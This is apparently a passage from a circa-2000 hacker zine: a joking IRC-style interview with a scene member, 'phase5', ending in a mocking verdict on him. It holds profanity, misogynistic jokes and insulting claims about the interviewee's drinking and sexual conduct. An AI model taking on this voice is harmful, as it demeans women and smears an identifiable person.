: i'd marry myself
: so the next day
: i'd have achick
: to cook, clean and take my agression
:
: Do you think I'm fat?
: in those pants? yes
:
: Thoughts on Project K?
: project k demands bananas
:
: Have you ever spoken to the devil?
: no
: he once felt me up on the bus tho
: but i ignored him
:
: Ever woken up screaming 'Oh god, what happened to my penis?!!'?
: yes
: several times
:
: Know where I can get some 0day pr0n action?
: www.thehun.net
: has 0hday
: i have others
: but i dont give out my secrets
: phase5 thanks for you time, I'll ask you one more question...
: ok
:
: I haven't got anywhere to stay tonight, reckon I could crash at
: your place?
: im sleeping at the park tonight. you're welcome to join me
: Thank you phase5. Your thoughts will forever live on in
: infosurge8....... you fucking sad little weirdo...
: guess what
: What?
: im removing your midget monkey article from is7
: you fuck
: I hate you.
: eric?
: is that you?
: Pablo?
: yes
: its me
: One more thing zak....
: yes?
: i'll come back to it later
: The people deserve to know.
: what was the question?
: Whos the most interesting person you've ever met online?
: there's no-one really
: that stands out as really interesting
: not on irc anyway
: You said you come back to it, the coolest person.
: coolest?
: me
: Stop being a tight fuck, its your fucking zine, name names.
: OK FUCK
: LOOK
: NO ONE IS FUCKING INTERESTING
: YOUR NOT COOL
: YOUR SAD FUCKS WITH NO LIVES
: i have met one krad person on icq tho
: Who was?
: and here ends interview
: Shit, you really are an alco huh? Please note, phase is hanging to
: get to the park to drink alone.
: fucking yes
: its 12:00
: i want to go
: spend time with jim
: my friend
: leave me alone
: blur my fucking face
: blur it
:
: -In conclusion-
:
: phase5 is a creepy little man. Hes the type of person if you saw walking
: towards you on the street, you'd cross the road to avoid him. His past times
: include, drinking alone in parks, abusing women and masturbating over old
: #phreak logs. He has a habit of asking people for money and soiled panties.
: Once upon a time, there was a guy who went well at school, knew the secrets
: of au phreaking, now stands a dirty pervert who spends whatever money he
: makes on alcohol. On the Fleabag Human Rating System (TM) I give phase5
: 3/10. All three points are for jokes made about lymcos mother that I
: found somewhat amusing.
:
: Fleabag. 8/12/00
:
:.....................................................
:
:
[ ]
e o f